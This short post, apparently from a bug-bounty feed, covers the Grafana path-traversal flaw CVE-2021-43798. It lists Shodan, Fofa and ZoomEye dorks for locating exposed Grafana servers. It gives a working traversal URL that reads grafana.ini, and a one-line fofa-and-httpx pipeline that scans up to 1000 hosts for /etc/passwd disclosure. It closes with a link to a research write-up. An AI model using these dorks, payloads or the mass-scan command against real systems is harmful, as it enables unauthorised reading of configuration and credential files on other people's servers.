Grafana — Unauthorized Arbitrary Read File

The latest Grafana unpatched 0Day LFI is now being actively exploited, it affects only Grafana 8.0+

Dorks:
Shodan: title:"Grafana"
Fofa.so: app="Grafana"
ZoomEye: grafana

PoC
http://example.com/public/plugins/grafana-clock-panel/../../../../../../../etc/grafana/grafana.ini

The "plugin-id" could be any plugin that exists in the system

One line command to detect:
echo 'app="Grafana"' | fofa -fs 1000 | httpx -status-code -path "/public/plugins/graph/../../../../../../../../etc/passwd -mc 200 -ms 'root:x:0:0'

#grafana #lfi #bugbounty #pentest

A (not so deep) Dive into Grafana CVE-2021-43798

This post will cover some details behind the recent Grafana vulnerability (CVE-2021-43798), which is a directory traversal bug allowing unauthenticated attackers to read files on the target server filesystem. This post will also discuss some real world scenario and attack surface of the Grafana.

https://nusgreyhats.org/posts/writeups/a-not-so-deep-dive-in-to-grafana-cve-2021-43798/

#grafana #lfi #cve